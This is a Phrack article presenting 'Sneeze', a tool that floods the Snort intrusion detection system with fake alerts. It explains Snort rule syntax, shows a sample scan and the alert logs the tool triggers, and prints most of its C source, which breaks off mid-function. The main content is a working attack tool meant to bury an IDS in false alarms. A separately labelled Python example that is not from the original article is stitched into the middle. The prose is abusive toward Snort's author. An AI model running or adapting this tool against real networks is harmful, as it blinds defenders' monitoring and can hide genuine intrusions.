==Phrack Inc.==

Volume 0x0b, Issue 0x3e, Phile #0x0d of 0x0f

|=----------------=[ Sneeze: Wreaking Havoc Upon Snort ]=---------------=|
|=----------------------------------------------------------------------=|
|=--------------=[ daemon10 ]=--------------=|

1. Introduction
2. Snort Rules
   2.a Example snort Rule
   2.b Rule Syntax and Analysis
3. The Code
   3.a Programming considerations
   3.b The Holy Grail Itself
4. Outro
   4.a Self-Promotion
Bibliography

--[ 1. Introduction to Sneeze

"I was gonna rip his heart out. I'm the best ever. I'm the most brutal and
vicious, the most ruthless champion there has ever been. No one can stop me.
Lennox is a conqueror? No! He's no Alexander! I'm Alexander! I'm the best
ever. I'm Sonny Liston. I'm Jack Dempsey. There's never been anyone like me.
I'm from their cloth. There is no one who can match me. My style is
impetuous, my defense is impregnable, and I'm just ferocious. I want his
heart! I want to eat his children! Praise be to Allah!"
    - Mike Tyson

OK, now that I've come up with a wonderfully clever name for my program, and
some great quotes by my favorite heavyweight boxer, it's time to get down to
the code. What is snort? What is sneeze?

snort (snôrt) n. A rough, noisy sound made by breathing forcefully through
the nostrils, as a horse or pig does.

sneeze (snēz) intr. v. To expel air forcibly from the mouth and nose in an
explosive, spasmodic involuntary action resulting chiefly from irritation of
the nasal mucous membrane.

From [1], "Snort is an open source network intrusion detection system,
capable of performing real-time traffic analysis and packet logging on IP
networks. It can perform protocol analysis, content searching/matching and
can be used to detect a variety of attacks and probes, such as buffer
overflows, stealth port scans, CGI attacks, SMB probes, OS fingerprinting
attempts, and much more.

Snort uses a flexible rules language to describe traffic that it should
collect or pass, as well as a detection engine that utilizes a modular plugin
architecture. Snort has a real-time alerting capability as well,
incorporating alerting mechanisms for syslog, a user specified file, a UNIX
socket, or WinPopup messages to Windows clients using Samba's smbclient.

Snort has three primary uses. It can be used as a straight packet sniffer
like tcpdump(1), a packet logger (useful for network traffic debugging, etc),
or as a full blown network intrusion detection system."

So what is sneeze? As you can guess, it is the exact inversion and opposite of
the popular network IDS tool, snort. Snort wants packets. Sneeze's job is to
send millions and millions of them. Since snort is a piece of shit with tons
of exploitable and DOS'able overflows (which unfortunately we aren't going to
publish simply because they can be fixed too easily), one might expect that
it would also suck at detecting false positives and floods and the like.
Which, it does!

Snort purports to be an excellent way for people who aren't sure how to
disable default services and generally secure their server to detect
intrusion attempts. It is also an official tool of our favorite friends over
at Project Honeynet [2]. In the direct words of the devil himself,

"Snort-Inline: Currently the Honeynet Project's control capabilities are
based on IPTables and Snort-Inline. We are looking for people to port
snort-inline to other firewalls and operating systems, including pf on
OpenBSD."

--[ 2. Snort Rules

"I can sell out Madison Square Garden masturbating."
    - Mike Tyson

Snort is a piece of shit, and a pretty basic piece of shit at that. I'm not
sure exactly who Marty Roesch is, but judging by the sheer volume of
off-by-ones, integer overflows, and logic bugs I found in his code, he was
probably subject at one point to an intense training session by the Shmoo
Group.
2.a Example snort Rule

To generate the sneeze output, we will be using the Snort rule files. Let's
take a look at an example rule file, taken from the snort.org website [3]:

SID        209
message    BACKDOOR w00w00 attempt
Signature  alert tcp $EXTERNAL_NET any -> $TELNET_SERVERS 23
           (msg:"BACKDOOR w00w00 attempt"; flow:to_server,established;
           content:"w00w00"; reference:arachnids,510;
           classtype:attempted-admin; sid:209; rev:4;)
Summary    w00w00 is a Trojan Horse utilizing Telnet. This event is generated
           when an attacker attempts to connect to a w00w00 server using
           Telnet.
Impact     Possible theft of data and control of the targeted machine leading
           to a compromise of all resources the machine is connected to. This
           Trojan also has the ability to delete data, steal passwords and
           disable the machine.

As one can see, this is an extremely serious and threatening vulnerability,
which lurks to destroy even the most paranoid of admins. Most snort rules
come attached to a plethora of useless verbose information that we can just
ignore. This makes it simple for a network administrator to see in his log
directory the exact time and reason why he was owned, instead of simply
giving a CERT# or exploit name that he would have to manually reference using
a web search engine.

In any case, the rule doesn't say much. Of course, the basic breakdown is
that the data must occur over an open (established) tcp session. The traffic
must be sent to one of the telnet servers. TELNET_SERVERS is a snort
preprocessor definition which is defined in snort.conf, and is typically
defined to be $HOME_NET. For an unconfigured snort setup, HOME_NET will match
"any" IP, but it can also be set to a subnet range such as 10.0.0.* or
192.168.0.* or whatever you want it to be. The data must be flowing
"to_server." I'm sure you can figure this out... the data packet must also
contain the string "w00w00." This rule is so simple we could just telnet to
the server and type "w00w00" and trigger the snort rule if it's set.

Notice how dumb this is: jobe can't even read his mail without

  1. Setting off a snort alarm by typing in his password "w00w00"
  2. Getting sniffed and owned because he's logging into df.ru via telnet

There's not much to this. Let's look at one last example before we get into
the code. This example is more complex:

RPC mountd UDP export request

alert udp $EXTERNAL_NET any -> $HOME_NET any (msg:"RPC mountd UDP export
request"; content:"|00 00 00 00|"; offset:4; depth:4; content:"|00 01 86 A5|";
offset:12; depth:4; content:"|00 00 00 05|"; distance:4; within:4;
reference:arachnids,26; classtype:attempted-recon; sid:1924; rev:4;)

We have multiple fields to keep our eye on. Here the packet contents are
delimited by '|' so we know that the result will be packed as a hex string.
Hex strings can be 1, 2, or 4 bytes, depending on whether there are 2, 4, or
8 adjacent hex digits. For example, 03 is one hex byte, 0003 is a short hex
word, etc. The offset field denotes what offset from the start of the packet
the specified (byte) string will be found at. After an initial match, the
"within" keyword specifies a minimum number of bytes from the last match that
the current match should be found within.

2.b Rule Syntax and Analysis

Here is a list of snort keywords with which we will be concerned:

Keyword    Description
-------    -----------
dsize      Specifies a necessary payload data size. Can be used with <>
           operators to specify ranges.
content    Matches a content string. Can be combined with the ! operator for
           inversions.
offset     Specifies a content offset from the payload start.
depth      Specifies the maximum number of bytes to search through in order
           to make a content-based match.
nocase     Toggles off case-sensitive matching.
flow       Flow of traffic. Can be to_server, from_server, etc.
distance   Specifies the minimum byte distance between content matches.

There are things we won't be concerned with. These include preprocessors
such as HTTP decode and keyword directives such as icmp_id.

Notice that the snort guides have reams of wonderful, efficient rules to
secure your personal network from pesky intruders:

alert tcp any any -> 192.168.1.0/24 80 (content: "cgi-bin/phf"; \
    offset: 3; depth: 22; msg: "CGI-PHF access";)

Of course, nobody would ever consider sending something like "GET
/cgi-bin/blah..." to an HTTP server, so your depth match will be sure to
catch ALL intrusion attempts.

Since the snort rules give vague notions of how data should be arranged in a
malicious packet (apart from the fixed fields specified by the "content"
directive), we can easily create a polymorphic engine which can repeatedly
send all sorts of fake snort triggers, with randomized data content and data
lengths. And that's exactly what we did.

--[ 3. The Code

"This country was built on rape, slavery, murder, degradation and affiliation
with crime."
    - Mike Tyson

3.a Programming Considerations

The following program could have been made more complete and thorough by
employing packet construction techniques that matched all possible snort rule
directives. The code below only works on exploits that utilize plain vanilla
TCP connections and UDP attacks. And believe me, there are plenty of such
attacks to go around for everybody. Some rules require special IP or TCP
options to be set, or IP fragmentation, etc. Even though I am the renowned
author of the famous libnet library, and the world's foremost authority on IP
spoofing, TCP hijacking, and packet construction, I was not able to include
these features into sneeze 1.0 because of the time such features would
require. I have a fast car, a girlfriend, and a complex web of social
acquaintances, so... dear reader, as you may have guessed, I have better
things to do than develop free software that meets all your demands and
specifications. Besides, using standard sockets to do all the work is good
because it allows the program to be run by any user.
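Before the sample run, here is an added example (not part of the original article and not sneeze code) that evaluates the content, offset, depth, distance, within and nocase semantics from the keyword table in section 2 over sample payloads, using the mountd, CGI-PHF and w00w00 rules quoted above. It shows why a content-only rule fires identically on a real mountd EXPORT call and on alphanumeric filler carrying the same twelve fixed bytes, which is the gap that flow, dsize and protocol-aware preprocessors exist to close. The RPC header layout follows ONC RPC (RFC 5531); the filler payload is constructed for the demo.

```python
import struct
from dataclasses import dataclass
from typing import List, Optional


@dataclass
class Content:
    """One content match with the modifiers the article's keyword table lists."""
    pattern: bytes
    offset: int = 0               # absolute start of the search window
    depth: Optional[int] = None   # window length measured from offset
    distance: int = 0             # gap after the end of the previous match
    within: Optional[int] = None  # window length measured after that gap
    nocase: bool = False


def parse_content(text: str) -> bytes:
    """Turn a Snort content string into the bytes it matches.

    Text between '|' pipes is hex; a token of up to 2/4/8 digits becomes a
    1/2/4-byte big-endian value (the grouping the article describes), and a
    backslash escapes the next character outside the hex sections.
    """
    out = bytearray()
    i = 0
    while i < len(text):
        ch = text[i]
        if ch == "\\" and i + 1 < len(text):
            out.append(ord(text[i + 1]))
            i += 2
        elif ch == "|":
            end = text.index("|", i + 1)  # ValueError if a hex section is unterminated
            for tok in text[i + 1:end].split():
                if len(tok) > 8:
                    raise ValueError("hex token too long: " + tok)
                width = 1 if len(tok) <= 2 else 2 if len(tok) <= 4 else 4
                out += int(tok, 16).to_bytes(width, "big")
            i = end + 1
        else:
            out.append(ord(ch))
            i += 1
    return bytes(out)


def rule_matches(contents: List[Content], payload: bytes) -> bool:
    """Evaluate the contents in order; each must lie entirely inside its window."""
    prev_end = 0
    for k, c in enumerate(contents):
        # distance/within make a content relative to the previous match;
        # otherwise offset/depth are measured from the start of the payload
        relative = k > 0 and (c.distance != 0 or c.within is not None)
        if relative:
            start = prev_end + c.distance
            end = len(payload) if c.within is None else start + c.within
        else:
            start = c.offset
            end = len(payload) if c.depth is None else start + c.depth
        window = payload[start:end]
        pos = (window.lower().find(c.pattern.lower()) if c.nocase
               else window.find(c.pattern))
        if pos < 0:
            return False
        prev_end = start + pos + len(c.pattern)
    return True


# sid:1924 from the article: RPC mountd UDP export request
MOUNTD_EXPORT = [
    Content(parse_content("|00 00 00 00|"), offset=4, depth=4),     # msg_type CALL
    Content(parse_content("|00 01 86 A5|"), offset=12, depth=4),    # program 100005 (mountd)
    Content(parse_content("|00 00 00 05|"), distance=4, within=4),  # procedure 5 (EXPORT)
]
# the CGI-PHF rule from the article
CGI_PHF = [Content(parse_content("cgi-bin/phf"), offset=3, depth=22)]
# sid:209 (w00w00) carries no nocase, so it is case-sensitive
W00W00 = [Content(parse_content("w00w00"))]


def rpc_call(xid: int, prog: int, vers: int, proc: int) -> bytes:
    """Constructed sample: the fixed header of an ONC RPC CALL (xid, msg_type=0,
    rpcvers=2, prog, vers, proc) followed by 16 zero bytes standing in for the
    credential and verifier fields."""
    return struct.pack(">IIIIII", xid, 0, 2, prog, vers, proc) + bytes(16)


def demo() -> dict:
    """Real traffic and sneeze-style junk look the same to a content-only rule."""
    # constructed: alphanumeric filler with only the rule's twelve fixed bytes
    # placed at offsets 4, 12 and 20, the way the article's tool lays them out
    junk = (b"4Yd2" + b"\x00\x00\x00\x00" + b"9qVs" + b"\x00\x01\x86\xa5"
            + b"0eHc" + b"\x00\x00\x00\x05")
    return {
        "real_export_call": rule_matches(MOUNTD_EXPORT, rpc_call(0x1234, 100005, 1, 5)),
        "junk_with_fixed_bytes": rule_matches(MOUNTD_EXPORT, junk),
        "real_mount_call": rule_matches(MOUNTD_EXPORT, rpc_call(0x1234, 100005, 1, 1)),
        "phf_in_depth": rule_matches(CGI_PHF, b"GET /cgi-bin/phf HTTP/1.0\r\n"),
        "phf_past_depth": rule_matches(CGI_PHF, b"GET /a/very/long/path/cgi-bin/phf\r\n"),
        "w00w00_upper": rule_matches(W00W00, b"W00W00\r\n"),
    }


if __name__ == "__main__":
    for name, hit in demo().items():
        print(f"{name:24s} {'ALERT' if hit else 'no alert'}")
```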
Here's some sample output... First the scan:

Starting nmap V. 3.00 ( www.insecure.org/nmap/ )
Interesting ports on juggernaut (192.168.0.6):
(The 1593 ports scanned but not shown below are in state: closed)
Port       State       Service
21/tcp     open        ftp
22/tcp     open        ssh
25/tcp     open        smtp
37/tcp     open        time
79/tcp     open        finger
111/tcp    open        sunrpc
113/tcp    open        auth
587/tcp    open        submission

Nmap run completed -- 1 IP address (1 host up) scanned in 2 seconds
infonexus#

Now, running sneeze with debugging output...

infonexus# ./sneeze juggernaut 21,22,25,37,79,111,113,587 /usr/pkg/share/snort/*.rules
[..... snip .....]
launching attack ...
ATTACK [SMTP expn *@]
 srcport - 0, dstport - 25, proto - tcp, dsize - 0
 offset = 0, distance = 0, within = 0, case-sensitive = 1, len = 7, [expn *@]
ATTACK LEN = 7 : [eXpN *@]
ATTACK [SMTP sendmail 5.5.5 exploit]
 srcport - 0, dstport - 25, proto - tcp, dsize - 0
 offset = 0, distance = 0, within = 0, case-sensitive = 1, len = 13, [mail from: "|]
ATTACK LEN = 13 : [mAiL fRoM: "|]
ATTACK [RPC portmap request ypserv]
 srcport - 0, dstport - 111, proto - udp, dsize - 0
 offset = 40, distance = 0, within = 0, case-sensitive = 0, len = 5, [\x01\x86\xa4\x00\x00]
ATTACK LEN = 45 : [4Yd29qVs0eHcxQBSEfTCJ1m3iRL8vwMPINoZhguW\x01¤\x00\x00]
^C
infonexus#

Here's the log we see in the other window with our trusty tail -f monitor:

[**] [1:1450:2] SMTP expn *@ [**]
[Classification: Misc Attack] [Priority: 2]
09/17-19:21:10.959696 192.168.0.1:64383 -> 192.168.0.6:25
TCP TTL:64 TOS:0x0 ID:51763 IpLen:20 DgmLen:59
***AP*** Seq: 0x10DAD08F  Ack: 0x80636DD1  Win: 0x4470  TcpLen: 32
TCP Options (3) => NOP NOP TS: 4423435 65878141
[Xref => http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-1999-1200]

[**] [1:1450:2] SMTP expn *@ [**]
[Classification: Misc Attack] [Priority: 2]
09/17-19:21:10.959803 192.168.0.1:64383 -> 192.168.0.6:25
TCP TTL:64 TOS:0x0 ID:51763 IpLen:20 DgmLen:59
***AP*** Seq: 0x10DAD08F  Ack: 0x80636DD1  Win: 0x4470  TcpLen: 32
TCP Options (3) => NOP NOP TS: 4423435 65878141
[Xref => http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-1999-1200]

[**] [1:662:3] SMTP sendmail 5.5.5 exploit [**]
[Classification: Attempted Administrator Privilege Gain] [Priority: 1]
09/17-19:21:12.965590 192.168.0.1:64382 -> 192.168.0.6:25
TCP TTL:64 TOS:0x0 ID:51773 IpLen:20 DgmLen:65
***AP*** Seq: 0x15071B8E  Ack: 0x805FB299  Win: 0x4470  TcpLen: 32
TCP Options (3) => NOP NOP TS: 4423439 65878342
[Xref => http://www.whitehats.com/info/IDS119]

[**] [1:662:3] SMTP sendmail 5.5.5 exploit [**]
[Classification: Attempted Administrator Privilege Gain] [Priority: 1]
09/17-19:21:12.965701 192.168.0.1:64382 -> 192.168.0.6:25
TCP TTL:64 TOS:0x0 ID:51773 IpLen:20 DgmLen:65
***AP*** Seq: 0x15071B8E  Ack: 0x805FB299  Win: 0x4470  TcpLen: 32
TCP Options (3) => NOP NOP TS: 4423439 65878342
[Xref => http://www.whitehats.com/info/IDS119]

[**] [1:590:2] RPC portmap request ypserv [**]
[Classification: Decode of an RPC Query] [Priority: 2]
09/17-19:21:14.975717 192.168.0.1:63432 -> 192.168.0.6:111
UDP TTL:64 TOS:0x0 ID:51781 IpLen:20 DgmLen:73
Len: 53
[Xref => http://www.whitehats.com/info/IDS12]

[**] [1:590:2] RPC portmap request ypserv [**]
[Classification: Decode of an RPC Query] [Priority: 2]
09/17-19:21:14.975818 192.168.0.1:63432 -> 192.168.0.6:111
UDP TTL:64 TOS:0x0 ID:51781 IpLen:20 DgmLen:73
Len: 53
[Xref => http://www.whitehats.com/info/IDS12]

3.b The Holy Grail Itself

Grab yourself some snort rule files to pipe into this, and then start
cutting .......
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>
#include <unistd.h>
#include <ctype.h>
#include <stdarg.h>
#include <time.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>

#define XDEBUG 1

/* we can't hope to generate these sorts of packets, so just skip them
   automatically */
char *ignored_keywords[] = {
    "id", "ipoption", "fragbits", "seq", "ack", "itype", "icode",
    "session", "icmp_id", "icmp_seq", "content-list", "uricontent",
    "ip_proto", "fragoffset", "tos", "ttl", "byte_test", "byte_jump"
};

/* FUCK SNORT */

#define DELAY_TIME 2            /* # seconds between attacks */
#define XMAX(x,y) (x > y ? x : y)

/* one "content" directive and the modifiers that were attached to it */
struct snort_data {
    unsigned int attack_len;
    unsigned char *attack_data;
    unsigned char case_insensitive;
    unsigned int offset;
    unsigned int distance;
    unsigned int within;
    struct snort_data *next;
};

/* everything should run in user mode... so not ALL attacks will be used */
struct snort_rule {
    char *description;
    unsigned short srcport;
    unsigned short dstport;
    unsigned char protocol;
    unsigned int dsize;
    struct snort_data *sdata;
    struct snort_rule *next;
};

struct snort_rule *ruleslist = NULL;
unsigned int num_rules = 0;

struct snort_rule *select_random_rule (int *availports);
int *read_port_list (char *ports);
void add_rule (char *buf);
int parse_line_data (struct snort_rule *rule, char *line);
void debug_printf (char *fmt, ...);
unsigned short getsrcport (char *portstr, char *proto);
void *parse_content_string (char *line, unsigned int *sizeptr);
void dump_snort_data (struct snort_data *data);
void mix_case (char *ptr, unsigned int len);
void *create_data_packet (struct snort_rule *rule, unsigned int *sizeptr);
void fill_random_data (char *buf, unsigned int len);
int random_number (int lo, int hi);
void *xrealloc (void *ptr, size_t size);

void
usage (char *program)
{
    fprintf (stderr, "Usage: %s <host> <port,port,...> rulefile1 "
             "[rulefile2 ...]\n", program);
    exit (EXIT_FAILURE);
}

int
main (int argc, char *argv[])
{
    FILE *f;
    struct snort_rule *cur;
    struct sockaddr_in s_in, bs_in;
    struct hostent *he;
    char *hostname;
    char *portlist;
    int i;
    int *ports, fd;

    srand (time (NULL));

    if (argc < 4)
        usage (argv[0]);

    hostname = argv[1];
    portlist = argv[2];

    if ((ports = read_port_list (portlist)) == NULL) {
        fprintf (stderr, "Error reading portlist!\n");
        exit (EXIT_FAILURE);
    }

    if ((he = gethostbyname (hostname)) == NULL) {
        herror ("gethostbyname");
        exit (EXIT_FAILURE);
    }

    memset (&s_in, 0, sizeof (s_in));
    s_in.sin_family = AF_INET;
    memcpy (&s_in.sin_addr.s_addr, he->h_addr, 4);

    /* every remaining argument is a snort rule file, one rule per line */
    for (i = 3; i < argc; i++) {
        char rulebuf[1024];

        f = fopen (argv[i], "r");
        if (f == NULL) {
            perror (argv[i]);
            exit (EXIT_FAILURE);
        }
        memset (rulebuf, 0, sizeof (rulebuf));
        while (fgets (rulebuf, sizeof (rulebuf) - 1, f) != NULL) {
            add_rule (rulebuf);
            memset (rulebuf, 0, sizeof (rulebuf));
        }
        fclose (f);
    }

    /* wreak havoc */
    printf ("launching attack ...\n");
    while (1) {
        char *attack_data = NULL;
        unsigned int attack_len;

        cur = select_random_rule (ports);
        if (cur == NULL) {
            fprintf (stderr, "Unexpected error encountered!\n");
            exit (EXIT_FAILURE);
        }
        debug_printf ("ATTACK [%s]\n srcport - %u, dstport - %u, "
                      "proto - %s, dsize - %d\n", cur->description,
                      cur->srcport, cur->dstport,
                      (cur->protocol == IPPROTO_TCP ? "tcp" : "udp"),
                      cur->dsize);
        dump_snort_data (cur->sdata);

        s_in.sin_port = htons (cur->dstport);
        /* choose a valid open port */
        if (!s_in.sin_port)
            s_in.sin_port = htons (ports[0]);

        if (cur->protocol == IPPROTO_TCP)
            fd = socket (AF_INET, SOCK_STREAM, IPPROTO_TCP);
        else
            fd = socket (AF_INET, SOCK_DGRAM, IPPROTO_UDP);
        if (fd < 0) {
            perror ("socket");
            exit (EXIT_FAILURE);
        }

        /* in case we need to bind to a particular port */
        if (cur->srcport) {
            int on = 1;

            memset (&bs_in, 0, sizeof (bs_in));
            bs_in.sin_family = AF_INET;
            bs_in.sin_addr.s_addr = INADDR_ANY;
            bs_in.sin_port = htons (cur->srcport);
            setsockopt (fd, SOL_SOCKET, SO_REUSEADDR, &on, sizeof (on));
            if (bind (fd, (struct sockaddr *) &bs_in, sizeof (bs_in)) < 0) {
                perror ("bind");
                close (fd);
                continue;
            }
        }

        attack_data = create_data_packet (cur, &attack_len);
        if (attack_data == NULL) {
            fprintf (stderr, "Unexpected error occurred!\n");
            exit (EXIT_FAILURE);
        }
        {
            unsigned int z;

            debug_printf ("ATTACK LEN = %d : [", attack_len);
            for (z = 0; z < attack_len; z++) {
                if (isprint ((unsigned char) attack_data[z]))
                    debug_printf ("%c", attack_data[z]);
                else
                    debug_printf ("\\x%.2x", (unsigned char) attack_data[z]);
            }
            debug_printf ("]\n");
        }

        if (cur->protocol == IPPROTO_TCP) {
            if (connect (fd, (struct sockaddr *) &s_in, sizeof (s_in)) < 0) {
                perror ("connect");
                close (fd);
                free (attack_data);
                continue;
            }
            send (fd, attack_data, attack_len, 0);
        } else
            sendto (fd, attack_data, attack_len, 0,
                    (struct sockaddr *) &s_in, sizeof (s_in));

        close (fd);
        free (attack_data);
        printf ("\n.");
        sleep (DELAY_TIME);
    }
    return 0;
}

#define ABORT_RULE { free (rule); return; }

/* parse the header of one rule line (action proto src sport dir dst dport)
   and hand the option block in parentheses to parse_line_data */
void
add_rule (char *buf)
{
    struct snort_rule *rule;
    char word1[64], word2[64], word3[64], word4[64], word5[64], word6[64],
         word7[64];
    char *ptr = buf;
    size_t len;

    if (buf[0] == '#' || buf[0] == 0)
        return;
    len = strlen (buf);
    /* strip the trailing newline; the copies made below don't carry one */
    if (buf[len - 1] == '\n')
        buf[len - 1] = 0;

    if ((rule = malloc (sizeof (struct snort_rule))) == NULL) {
        perror ("malloc");
        exit (EXIT_FAILURE);
    }
    memset (rule, 0, sizeof (struct snort_rule));
    rule->next = NULL;

    if (sscanf (buf, "%63s %63s %63s %63s %63s %63s %63s", word1, word2,
                word3, word4, word5, word6, word7) != 7)
        ABORT_RULE
    if (strcasecmp (word1, "alert"))
        ABORT_RULE
    if (!strcasecmp (word2, "tcp"))
        rule->protocol = IPPROTO_TCP;
    else if (!strcasecmp (word2, "udp"))
        rule->protocol = IPPROTO_UDP;
    else
        ABORT_RULE
    if ((strcmp (word3, "$EXTERNAL_NET")) && (strcmp (word3, "any")) &&
        (strcmp (word3, "$HOME_NET")) && (strcmp (word3, "$HTTP_SERVERS")) &&
        (strcmp (word3, "$SMTP_SERVERS")) && (strcmp (word3, "$SQL_SERVERS")) &&
        (strcmp (word3, "$TELNET_SERVERS")))
        ABORT_RULE

    /* handle multiple source ports by replicating a rule for each port:
       the copy has the "lo:" prefix removed and so reads the high port */
    if (strchr (word4, ':')) {
        char *dupbuf, *dptr, *dptr2;
        size_t cdiff;

        if ((dupbuf = strdup (buf)) == NULL)
            ABORT_RULE
        if ((dptr = strstr (dupbuf, word4)) == NULL) {
            free (dupbuf);
            ABORT_RULE
        }
        if ((dptr2 = strchr (dptr, ':')) == NULL) {
            free (dupbuf);
            ABORT_RULE
        }
        dptr2++;
        cdiff = (size_t) dptr2 - (size_t) dptr;
        memmove (dptr, dptr2, strlen (dptr2));
        memset ((dptr + strlen (dptr) - cdiff), 0, cdiff);
        add_rule (dupbuf);
        free (dupbuf);
    }
    if (!strcmp (word4, "any"))
        rule->srcport = 0;
    else {
        rule->srcport = getsrcport (word4, word2);
        if (!rule->srcport)
            ABORT_RULE
    }

    /* must go to the server or be bi-directional flow */
    if ((strcmp (word5, "->")) && strcmp (word5, "<>"))
        ABORT_RULE

    /* handle multiple destination ports the same way */
    if (strchr (word7, ':')) {
        char *dupbuf, *dptr, *dptr2;
        size_t cdiff;

        if ((dupbuf = strdup (buf)) == NULL)
            ABORT_RULE
        if ((dptr = strstr (dupbuf, word7)) == NULL) {
            free (dupbuf);
            ABORT_RULE
        }
        if ((dptr2 = strchr (dptr, ':')) == NULL) {
            free (dupbuf);
            ABORT_RULE
        }
        dptr2++;
        cdiff = (size_t) dptr2 - (size_t) dptr;
        memmove (dptr, dptr2, strlen (dptr2));
        memset ((dptr + strlen (dptr) - cdiff), 0, cdiff);
        add_rule (dupbuf);
        free (dupbuf);
    }
    if (!strcmp (word7, "$HTTP_PORTS"))
        rule->dstport = 80;
    else if (!strcmp (word7, "$ORACLE_PORTS"))
        rule->dstport = 1521;
    else if (!strcmp (word7, "$SHELLCODE_PORTS"))
        rule->dstport = 0;
    else if (!strcmp (word7, "any"))
        rule->dstport = 0;
    else {
        rule->dstport = getsrcport (word7, word2);
        if (!rule->dstport)
            ABORT_RULE
    }

    ptr = buf;
    rule->sdata = NULL;
    ptr = strchr (buf, '(');
    if (ptr == NULL)
        ABORT_RULE

    if (!parse_line_data (rule, ptr)) {
        /* success, prepend the rule to the list */
        if (ruleslist == NULL)
            ruleslist = rule;
        else {
            rule->next = ruleslist;
            ruleslist = rule;
        }
        num_rules++;
        debug_printf ("ADDED RULE - [%s], srcport = %d, dstport = %d, "
                      "proto = %d\n", rule->description, rule->srcport,
                      rule->dstport, rule->protocol);
        dump_snort_data (rule->sdata);
    }
    return;
}

#define REJECT_RULE { rejected = 1; goto done_parsing; }

/* parse the main data into the full snort rule */
/* return 1 if the operation fails, 0 otherwise */
int
parse_line_data (struct snort_rule *rule, char *line)
{
    struct snort_data *sdata = NULL, *last_data = NULL;
    char *ptr, *end_keyword, *begin_data, *end_data;
    unsigned int i;
    unsigned int rejected = 0;

    ptr = line;
    *ptr++ = 0;                 /* drop the opening '(' */

    while (1) {
        while (isspace (*ptr))
            ptr++;
        if (!*ptr)
            REJECT_RULE
        else if (*ptr == ')')
            goto done_parsing;

        end_keyword = ptr;
        /* remember keywords such as nocase take no parameters */
        while (*end_keyword && (*end_keyword != ':') && (*end_keyword != ';'))
            end_keyword++;
        if (!*end_keyword)
            REJECT_RULE
        *end_keyword++ = 0;
        if (!strlen (ptr))
            REJECT_RULE

        /* check to see if we can handle this keyword */
        for (i = 0; i < (sizeof (ignored_keywords) / sizeof (char *)); i++) {
            if (!strcasecmp (ptr, ignored_keywords[i]))
                REJECT_RULE
        }

        /* special case */
        if (!strcasecmp (ptr, "nocase")) {
            if (sdata == NULL)
                REJECT_RULE
            sdata->case_insensitive = 1;
            ptr = end_keyword;
            continue;
        }

        begin_data = end_keyword;
        while (isspace (*begin_data))
            begin_data++;
        if (*begin_data == '"')
            begin_data++;
        end_data = begin_data;
        if (*(begin_data - 1) == '"') {
            /* take account for escaped string sequences: stop at the first
               quote that is not preceded by a backslash */
            while (*end_data &&
                   !(*end_data == '"' && *(end_data - 1) != '\\'))
                end_data++;
            if (!*end_data)
                REJECT_RULE
        }
        if (*end_data == '"')
            *end_data++ = 0;
        end_data = strchr (end_data, ';');
        if (end_data == NULL)
            REJECT_RULE
        *end_data++ = 0;

        /* handle known keywords */

        /* we can only handle a small subset of datasize keywords... don't
           worry about ranges, only worry about the '>' operator, which will
           usually only be used to detect overflow attempts */
        if (!strcasecmp (ptr, "dsize")) {
            unsigned int gt = 0;

            while (isspace (*begin_data))
                begin_data++;
            /* make sure its an exact number or gt */
            if (!isdigit (*begin_data) && (*begin_data != '>'))
                REJECT_RULE
            /* Exceed '>' directive by x bytes */
#define GT_INC 16
            if (*begin_data == '>') {
                gt = 1;
                begin_data++;
            }
            rule->dsize = atoi (begin_data);
            if (!rule->dsize)
                REJECT_RULE
            if (gt)
                rule->dsize += GT_INC;
        }
        /* msg holds the rule description */
        else if (!strcasecmp (ptr, "msg")) {
            rule->description = strdup (begin_data);
            if (rule->description == NULL)
                REJECT_RULE
        } else if (!strcasecmp (ptr, "content")) {
            /* we can't handle inverted content matches */
            if (*begin_data == '!')
                REJECT_RULE
            sdata = malloc (sizeof (struct snort_data));
            if (sdata == NULL)
                REJECT_RULE
            memset (sdata, 0, sizeof (struct snort_data));
            if (last_data == NULL) {
                rule->sdata = sdata;
                last_data = sdata;
            } else {
                last_data->next = sdata;
                last_data = sdata;
            }
            sdata->attack_data = parse_content_string (begin_data,
                                                       &(sdata->attack_len));
            if (sdata->attack_data == NULL)
                REJECT_RULE
        }
        /*
         * only handle a very special case of flags....
         * basically anything that doesn't have to do with the ACK flag
         * will be filtered out, because we can't handle raw scans...
         * I don't know why flags:A+ is sometimes specified but it is...
         */
        else if (!strcasecmp (ptr, "flags")) {
            char *fptr;

            fptr = begin_data;
            while (isspace (*fptr))
                fptr++;
            if (strncmp (fptr, "A+", 2))
                REJECT_RULE
        } else if (!strcasecmp (ptr, "offset")) {
            if (sdata == NULL)
                REJECT_RULE
            sdata->offset = atoi (begin_data);
        } else if (!strcasecmp (ptr, "distance")) {
            if (sdata == NULL)
                REJECT_RULE
            sdata->distance = atoi (begin_data);
        } else if (!strcasecmp (ptr, "within")) {
            if (sdata == NULL)
                REJECT_RULE
            sdata->within = atoi (begin_data);
        }
        ptr = end_data;
    }

done_parsing:
    if (rejected) {
        struct snort_data *dptr = rule->sdata;

        /* destroy the rule information */
        while (dptr != NULL) {
            struct snort_data *cur;

            cur = dptr;
            dptr = dptr->next;
            if (cur->attack_data != NULL)
                free (cur->attack_data);
            free (cur);
        }
        if (rule->description != NULL)
            free (rule->description);
        free (rule);
        return 1;
    }
    return 0;
}

/* comma-delimited list of portnames from command line input */
int *
read_port_list (char *ports)
{
    char *ptr = ports;
    int *portlist = NULL, num;
    unsigned int nitems = 0;

    while (ptr != NULL && *ptr) {
        ptr = strchr (ports, ',');
        if (ptr != NULL)
            *ptr++ = 0;
        num = atoi (ports);
        if (!num)
            return NULL;
        ports = ptr;
        nitems++;
        portlist = xrealloc (portlist, (sizeof (int) * (nitems + 1)));
        portlist[nitems - 1] = num;
        portlist[nitems] = 0;   /* the list stays zero-terminated */
    }
    return portlist;
}

/* target a random attack, picked out of availports */
struct snort_rule *
select_random_rule (int *availports)
{
    struct snort_rule *r;
    unsigned short num;
    unsigned int i = 0;
    int *pptr;

    if (num_rules == 0)
        return NULL;
    /* make sure at least one rule targets an open port, otherwise the
       walk below would never terminate */
    for (r = ruleslist; r != NULL && !i; r = r->next)
        for (pptr = availports; *pptr; pptr++)
            if (r->dstport == *pptr)
                i = 1;
    if (!i)
        return NULL;
    i = 0;

    num = random_number (0, num_rules - 1);
    r = ruleslist;
    while (i < num) {
        r = r->next;
        if (r == NULL)
            r = ruleslist;
        /* only count rules aimed at a port we know is open */
